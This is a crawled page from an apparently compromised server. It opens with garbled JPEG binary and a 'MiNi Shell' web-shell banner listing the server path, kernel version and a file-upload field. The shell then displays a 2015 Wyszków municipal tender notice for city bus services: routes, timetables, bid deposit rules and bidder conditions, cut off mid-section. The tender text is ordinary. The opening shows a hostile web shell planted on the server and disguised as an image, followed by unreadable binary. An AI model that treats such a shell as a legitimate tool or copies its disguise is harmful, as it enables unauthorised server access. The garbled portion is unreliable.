JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151117/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151117/309084-N-2015.html

<p class="kh_header"><b>Wyszków: Świadczenie usług przewozowych w komunikacji miejskiej na terenie Gminy Wyszków</b><br>
<b>Numer ogłoszenia: 309084 - 2015; data zamieszczenia: 17.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wyszków , Aleja Róż 2, 07-200 Wyszków, woj. mazowieckie, tel. 029 7424201, faks 029 7424209.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wyszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług przewozowych w komunikacji miejskiej na terenie Gminy Wyszków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest świadczenie usług przewozowych w komunikacji miejskiej na terenie miasta Wyszków oraz przyległych miejscowości w okresie od dnia  01.01.2016 roku do dnia  31.12.2017 roku.

Zamówienie obejmuje realizację usług przewozowych na następujących liniach komunikacyjnych:
linia nr 1- Wyszków dworzec  PKS-PKP - Leszczydół Nowiny -Natalin - Wyszków PKS-PKP
linia nr 2 - Wyszków dworzec  PKS-PKP -Drogoszewo (Wyszków I AWP, Rybienko Leśne -Drogoszewo)
Wyszków dworzec  PKS-PKP -Drogoszewo (Wyszków I AWP, Rybienko Leśne -Drogoszewo - Deskurów)
linia nr 3- Drogoszewo - Wyszków dworzec  PKS-PKP (Wyszków  Rybienko Leśne  - KEN -Zapole- Sikorskiego)
- Deskurów -Drogoszewo - Wyszków dworzec  PKS-PKP (Wyszków  Rybienko Leśne  - KEN -Zapole- Sikorskiego)
linia nr 4- Wyszków dworzec PKS-PKP (Wyszków Sienkiewicza - Pułtuska cmentarz- Leszczydół Podwielątki) - Wyszków dworzec PKS-PKP
dodatkowe 2 kursy  niedziela i święta - Wyszków Pułtuska cmentarz - Leszczydół Podwielątki
linia nr 5 - Wyszków dworzec PKS-PKP -   Olszanka - Wyszków dworzec PKS/PKP
linia nr 6 Wyszków dworzec PKS-PKP - Skuszew ul. Łochowska, Bociania, Wschodnia, Łochowska - Wyszków dworzec PKS-PKP

Szczegółowy przebieg linii komunikacyjnych jest następujący:
Przebieg trasy  linia nr 1- Wyszków ul. S. Okrzei ( dworzec PKS-PKP) - ul. Gen. J. Sowińskiego I  -ul. H. Sienkiewicza -  ul.  I AWP Topaz- ul. Sosnowa skrzyżowanie - Leszczydół Nowiny  ul. Wyszkowska Nadleśnictwo - Leszczydół Nowiny ul. Szkolna (szkoła) - Leszczydół Nowiny I  - Leszczydół Nowiny II- Leszczydół Nowiny ul. Dębowa (las) - Leszczydół Nowiny ul. Dębowa (Figurka) -Natalin ul. Wyszkowska III- Natalin II - Natalin I - Natalin skrzyżowanie - Wyszków ul. Białostocka  - ul. T.  Kościuszki (park)- ul. Sowińskiego (PBK) - Sowińskiego (sezam) - ul. Prosta - ul. I AWP ZSZ - Dworcowa  - Wyszków ul. S. Okrzei ( dworzec PKS-PKP).

Przebieg trasy linia nr 2 - Wyszków ul. S. Okrzei ( dworzec PKS-PKP) - ul. - Gen. J. Sowińskiego   -ul. H. Sienkiewicza - ul. I AWP (topaz) - ul.  I AWP (ZSZ)- ul. I AWP ( Lidl) - ul. Wąska - ul. I. Daszyńskiego - ul. Warszawska - ul. K. Skarżyńskiego -  Aleja Wolności I - Aleja Wolności II - ul. Jagiellońska - Drogoszewo I - Drogoszewo II - p. Drogoszewo koło Wyszków - Deskurów I-Deskurów II - Deskurów III.

Przebieg trasy linia nr 3  - Deskurów I -Deskurów II - Deskurów III -Drogoszewo k/Wyszków - Drogoszewo II - Drogoszewo I - Wyszków ul. Jagiellońska- Aleja Wolności II - Aleja Wolności I  - ul. K. Skarżyńskiego - ul. Warszawska- ul.  T. Kościuszki - ul. 3 Maja (Park) - ul.  3 Maja (OPS)  -  ul. KEN (ZDZ) -  ul. Zapole - ul- Geodetów -ul. Centralna - ul. Gen. Wł. Sikorskiego (przychodnia) - ul. Gen. Wł. Sikorskiego (garaże) -  ul. Pułtuska os. Polonez - ul. Pułtuska   Przejazd kolejowy -  ul. Pułtuska (Oś Norwida) - ul. Sowińskiego ( sezam) - ul. Prosta - ul.  I AWP(ZSZ) - ul. I AWP (Topaz) - ul. H. Sienkiewicza -   ul. Gen. J. Sowińskiego I - Wyszków ul. S. Okrzei ( dworzec PKS-PKP).

Przebieg trasy linia nr 4 - Wyszków ul. S. Okrzei ( dworzec PKS-PKP) - ul. - Gen. J. Sowińskiego I -  ul. H. Sienkiewicza - ul. I AWP, ZSZ - ul. Prosta - ul. Gen. J. Sowińskiego (sezam) - ul. Sowińskiego (PBK) - ul. 3 Maja (park) - 3 Maja (OPS) - KEN (Szpital) -  Serocka ul. Zapole -  ul. Geodetów-  ul. Centralna- ul. Sikorskiego (przychodnia) - ul. Sikorskiego (garaże) -ul. Pułtuska (Cmentarz) -  ul. Pułtuska (FSO II) - Leszczydół Stary - Leszczydół Stary II - Leszczydół Stary III - Leszczydół Działki - Leszczydół Podwielątki - Leszczydół Podwielątki - Leszczydół Działki - Leszczydół Stary III - Leszczydół Stary II - Leszczydół Stary - ul. Pułtuska  (FSO II) - ul. Pułtuska (Cmentarz) - ul. Gen. Wł. Sikorskiego (garaże) -ul. Gen. Wł. Sikorskiego (przychodnia) - ul. Centralna - ul. Geodetów - ul. Zapole - Serocka ul. KEN (ZDZ) - ul. 3 Maja (OPS) - 3 Maja (Park) - ul. Gen. J. Sowińskiego (PBK)- ul. Gen. J. Sowińskiego (sezam) - Wyszków ul. S. Okrzei ( dworzec PKS-PKP). 

Przebieg trasy linia nr 5 - Wyszków ul. S. Okrzei ( dworzec PKS/PKP) - ul. - Gen. J. Sowińskiego I - ul. H. Sienkiewicza - ul. I AWP ZSZ - ul. Prosta - ul. Gen. J. Sowińskiego ( sezam) - ul. Pułtuska (przejazd kolejowy) - ul. Pułtuska  (os. Polonez) - ul. Pułtuska (Cmentarz) - Leszczydół Stary- Olszanka- Olszanka (wieś) - Olszanka (szkoła) - Olszanka skrzyżowanie Sitno - Olszanka I - Olszanka II - Olszanka III - ul. Żytnia (Kościół) - ul. Centralna, ul. Geodetów- ul. Zapole - ul. KEN (ZDZ)-  3 Maja (OPS), 3 Maja (Park)  - ul. Gen. J. Sowińskiego (PBK)-  - ul. Gen. J. Sowińskiego ( sezam) -  ul. Prosta - ul. I AWP (ZSZ) -  Wyszków ul. S. Okrzei ( dworzec PKS-PKP).

Przebieg trasy linia nr 6- Wyszków ul. S. Okrzei ( dworzec PKS-PKP) -ul. Sowińskiego (sezam),  ul. Sowińskiego (PBK) - Kościuszki (park)- ul. Łochowska - Bociania - Przejazdowa -Wschodnia - Łochowska - Kościuszki (park) - Sowińskiego (PBK) ul. Sowińskiego (sezam) - Wyszków ul. S. Okrzei  (dworzec PKS/PKP).
Liczbę kilometrów jednego kursu Zamawiający szacuje następująco:
Linia nr 1 - 17,5 km  
Linia nr 2 - 9 km  i 11 km
Linia nr 3 - 14 km i 16 km
Linia nr 4 - 27,80 km
Linia nr 5 - 19 km 
Linia nr 6 -  5,5 km

Ilość kursów i Rozkład jazdy:
Autobusy będą kursowały w dni  robocze od poniedziałku do piątku oraz w niedziele i święta, 

Liczba kursów w dni robocze - dziennie:  
na trasie linii nr 1 - 3 kursy
na trasie linii nr 2 - 15  kursów ( w tym 4 do Deskurowa), 
na trasie linii nr 3- 15 kursów (w tym 4 do Deskurowa), 
na trasie linii nr 4 -  3 kursy, 
na trasie linii nr 5 - 2 kursy
na trasie linii nr 6 - 2 kursy
z uwzględnieniem  
Wstępnie zakładana realizacja kursów w godzinach: 4:55 - 20:00. Kursy rano w godz. 600 -700- 800 ( dojazd do pracy i do szkół), na linii nr 2 i 3 w godz. 455-515 , po południu (powrót  w godz. 1510 i 1610), cmentarz przy ul. Pułtuskiej dojazd  (w godz. 10) i powrót (w godz.12 ). 
uruchomienie dodatkowego kursu do cmentarza w dniu 1 listopada 

Liczba kursów w niedziele i święta:
- na trasie linii nr 4  - 2 kursy  w dni świąteczne (niedziela i święta) w godz. 8-10 (Wyszków dworzec PKS- PKP - ul. Pułtuska (cmentarz) - Leszczydół Podwielątki) oprócz pierwszego dnia Bożego Narodzenia, Wielkanocy i Nowego Roku.
Szacunkowa ilość wozokilometrów w ciągu roku 180 000 
w ciągu 2 lat - 360 000 

Rozkład jazdy:
-  Rozkład jazdy (schemat linii autobusowej i lokalizację przystanków) Wykonawca przedstawi  do akceptacji i ewentualnych korekt  przed podpisaniem umowy. Zaakceptowany rozkład jazdy schemat linii autobusowej i lokalizacja przystanków  będzie stanowił Załącznik Nr 1 i 2  do umowy .
- Zaakceptowany rozkład jazdy wraz ze schematem linii autobusowej ( informacją o przebiegu linii) Wykonawca umieści na przystankach autobusowych komunikacji miejskiej na terenie miasta i gminy Wyszków oraz na dworcu autobusowym (zgodnie z Rozporządzeniem Ministra Transportu  i Gospodarki Morskiej z dnia 10.04.2012r  w sprawie rozkładów jazdy Dz. U. z 2012r poz. 451).
- Wykonawca zobowiązany jest do podania  rozkładu jazdy do publicznej wiadomości (w tym w prasie lokalnej ) nie później niż w terminie 7 dni przed dniem jego obowiązywania (na własny koszt, także w przypadku wprowadzenia zmian w rozkładach jazdy).
- Wykonawca opracuje regulamin przewozu osób, po zatwierdzeniu przez Zamawiającego, umieści  go na dworcu autobusowym w miejscu dostępnym dla pasażerów.  
- Wykonawca na własny koszt uzyska wszelkie niezbędne zezwolenia-zaświadczenia wymagane przepisami prawa do świadczenia usług przewozowych będących przedmiotem niniejszej umowy.
- Wykonawca na bieżąco na własny koszt (nie rzadziej niż raz w miesiącu) uzupełni brakujące, zmienione  lub zniszczone rozkłady jazdy (w sposób by były widoczne i czytelne tj. o formacie nie mniejszym niż A4)  na przystankach komunikacji miejskiej . O terminie i zakresie przeprowadzonych prac informuje Zamawiającego na piśmie. 
-  Wykonawca ma obowiązek przestrzegać rozkładu jazdy, utrzymywać pojazdy w należytym stanie technicznym, estetycznym oraz prowadzić kulturalną obsługę pasażerów. 
- Strony ustalają następującą tolerancję dla planowanych godzin przyjazdów i odjazdów: przyspieszenie do 3 min., opóźnienie do 5 min. 
-  Wykonawca nie ponosi odpowiedzialności za opóźnienia w komunikacji wynikające z nadzwyczajnych warunków atmosferycznych ( huragan, ulewy, śnieżyce).

Zamawiający zastrzega sobie możliwość modyfikacji trasy  i rozkładów jazdy, dodawania nowych, likwidowania istniejących linii komunikacyjnych uwzględniając stopień zapotrzebowania na usługi przewozowe na co najmniej 30 dni przed terminem wprowadzenia zmian.  

Zamawiający wymaga aby usługi przewozowe były realizowane zgodnie z zatwierdzonymi rozkładami jazdy i wynikającym z nich zestawieniem kilometrów na liniach. Kilometry dojazdowe i zjazdowe wykonywane będą na koszt Wykonawcy.

Inne zobowiązania Wykonawcy:
1) Wykonawca zobowiązany jest do zmiany oznaczenia trasy wynikającej np. z remontu drogi oraz podania do wiadomości  o tych zmianach .
2) Wykonawca umieści w  autobusie w widocznym miejscu informację o możliwości i sposobie składania skarg i wniosków odnośnie funkcjonowania linii autobusowej, wraz z podaniem nr telefonu Zamawiającego. Wykonawca przekaże Zamawiającemu po zakończeniu kwartału informację  o liczbie i sposobie załatwienia skarg i reklamacji składanych przez pasażerów oraz przyznania ewentualnych  odszkodowań w związku z realizacją usługi.
3) Wykonawca zobowiązany jest do wprowadzenia systemu biletowego oraz systemu zarządzania komunikacją, by Zamawiający otrzymał dane dotyczące min. ilości i rodzaju sprzedanych biletów  oraz przejechanych wozokilometrów w danym miesiącu na poszczególnych liniach z uwzględnieniem konkretnych kursów.
4) Wykonawca po zakończeniu danego miesiąca, przekaże raport z wykonanej ilości kursów  z zestawieniem przejechanych wozokilometrów oraz ilości i rodzajów sprzedanych biletów ulgowych. 
Po zakończeniu kwartału przedstawi Zamawiającemu  sprawozdanie z realizacji usług świadczonych   w zakresie publicznego transportu zbiorowego w tym informacji dotyczących liczby pasażerów   na danej linii komunikacyjnej ( z wyszczególnieniem liczby pasażerów na danym kursie). 
Za wykonanie usług przewozowych będących przedmiotem umowy Zamawiający zapłaci  Wykonawcy wynagrodzenie będące dopłatą do zrealizowanych wozokilometrów. Podstawą wypłaty wynagrodzenia będzie Faktura Vat  wystawiona przez Wykonawcę i złożona Zamawiającemu wraz z raportem.
5) Wykonawca prowadził będzie punkt (kasy) sprzedaży biletów i biletów miesięcznych na terenie Wyszkowa - który winien mieścić się w obrębie ulic T. Kościuszki-S. Okrzei -Dworcowa- I AWP ( lokalizacja do akceptacji przez Zamawiającego). Punkt sprzedaży biletów musi być przystosowany do obsługi osób niepełnosprawnych oraz osób o ograniczonej zdolności ruchowej. Punkt winien być czynny co najmniej w dni robocze w godzinach 9.00 -10.00, 16.00-17.00.
5)  Wykonawca będzie stosował ceny biletów jednorazowych i miesięcznych oraz uprawnienia do bezpłatnych i ulgowych przejazdów  określone w Zarządzeniu Burmistrza nr 284-2015 z dnia  12.11.2015r. stanowiące załącznik nr 3 do umowy. Ceny biletów podane w zarządzeniu są cenami maksymalnymi. Zarządzenie Wykonawca umieści na dworcu autobusowym i w każdym autobusie, w miejscu dostępnym dla pasażera.
W przypadku zmiany ww zarządzenia w okresie trwania umowy, Wykonawca stosował będzie każde nowe obowiązujące Zarządzenie. Wpływy ze sprzedaży biletów będą stanowić dochód Wykonawcy, w zakresie określonym w w/w Zarządzeniu. Wykonawcy przysługiwać będą dopłaty do biletów komunikacji miejskiej (za wyjątkiem  biletów ulgowych na przejazd jednorazowy, od osoby która ukończyła 75 lat,  dla których cena biletu wynosi 0) na podstawie składanego comiesięcznie raportu  i protokołu . 
6) Wykonawca na własny koszt zajmie się drukiem i dystrybucją biletów. 

Autobusy i oznaczenie:
1) Realizacja przedmiotu umowy odbywać się będzie środkami transportu przystosowanymi do przewozu osób.
Środki transportu, którymi odbywać się będą przewozy, zostaną o z n a k o w a n e w następujący sposób: z przodu i tyłu pojazdu logo WKM, na bocznych burtach napis Wyszkowska Komunikacja Miejska z logo WKM- wg załączonego wzoru oraz umieszczonym numerem  linii 1, 2, 3, 4, 5, 6 przy czym wielkość liter min. 20 cm , umieszczone na przedniej i tylnej szybie . Kolor autobusu dowolny.
 2) Zamawiający wyraża zgodę, by na autobusach wykorzystywanych do świadczenia usługi będącej przedmiotem niniejszego zamówienia mogły być umieszczane reklamy. 
Reklamy mogą być zamieszczone na powierzchniach  bocznych i  z tyłu  pojazdu, z zachowaniem estetycznego wyglądu pojazdu. Wpływy z reklam stanowią dochód Wykonawcy.

Inne postanowienia:
Wykonawca nie ma prawa przekazywać ani zlecać podmiotom trzecim prowadzenia całości lub części usług przewozowych realizowanych na podstawie umowy, z wyjątkiem tych przypadków, na które została wyrażona pisemna zgoda Zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dopuszcza  możliwość udzielenia Wykonawcy wybranemu w niniejszym postępowaniu zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każda oferta musi być zabezpieczona wadium o wartości  10 000 zł  (słownie: dziesięć  tysięcy złotych). 
2.	Wadium może być wniesione w jednej lub kilku następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art.  6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
3.	Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczym w Wyszkowie nr rachunku bankowego  19 8931 0003 0002 2233 2029 0007 z dopiskiem na blankiecie przelewu jakiego postępowania dotyczy. 
4.	Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału wraz z ofertą (oddzielnie). Oryginał zostanie zwrócony  zgodnie z art. 46 ustawy Prawo zamówień publicznych.
5.	Wadium wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz  z odsetkami w przypadku, gdy wykonawca:
a)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.
6.	Wadium wnosi się przed upływem terminu składania ofert.
7.	 Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
8.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
9.	Dyspozycję w zakresie zwrotu wniesionych w pieniądzu wadiów wykonawców, zamawiający przekaże do banku niezwłocznie po:
a)	Wyborze najkorzystniejszej oferty lub unieważnieniu postępowania z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
b)	Wadium wykonawcy, którego oferta została wybrana jako najkorzystniejsza zamawiający zwróci niezwłocznie po zawarciu umowy oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
10.	Zamawiający niezwłocznie dokona zwrotu wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert,
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 tejże ustawy, lub pełnomocnictw, chyba ze udowodni, że wynika to z przyczyn nie leżących po jego stronie.
12.	Wadium wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz     z odsetkami w przypadku, gdy wykonawca:
a)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.
13.	Wadium wniesione w pieniądzu, Zamawiający przechowa na rachunku bankowym      i zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca złoży dokument, z którego wynika, że posiada uprawnienia niezbędne do wykonywania usługi będącej przedmiotem zamówienia, wynikające z ustawy z dnia 6 września 2001 roku o transporcie drogowym (Dz. U z 2013r., poz. 1414 ze zm.), tj. posiadają licencję na wykonywanie krajowego transportu drogowego osób (do oferty należy złożyć potwierdzoną za zgodność z oryginałem kopię licencji), 
Ocena tego warunku na podstawie załączonej do oferty licencji na wykonywanie krajowego transportu drogowego osób.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań. Oświadczenie  o spełnianiu warunków udziału  w postępowaniu zgodnie z art. 22 ust. 1  ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku: 
Warunek dysponowania odpowiednim potencjałem technicznym Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował zasobami niezbędnymi do realizacji zamówienia w całym okresie realizacji usługi tj. taborem autobusowym, spełniającym następujące wymagania:  
ilość autobusów - minimum 5  (pięć ),
Ocena tego warunku na podstawie Wykazu Potencjału technicznego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań.
 Ocena na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1  ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony, jeżeli Wykonawca złoży opłaconą polisę,  lub w  przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę gwarantowaną min. 200 000 zł
Ocena tego warunku  na podstawie załączonej polisy lub innego dokumentu potwierdzającego ubezpieczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
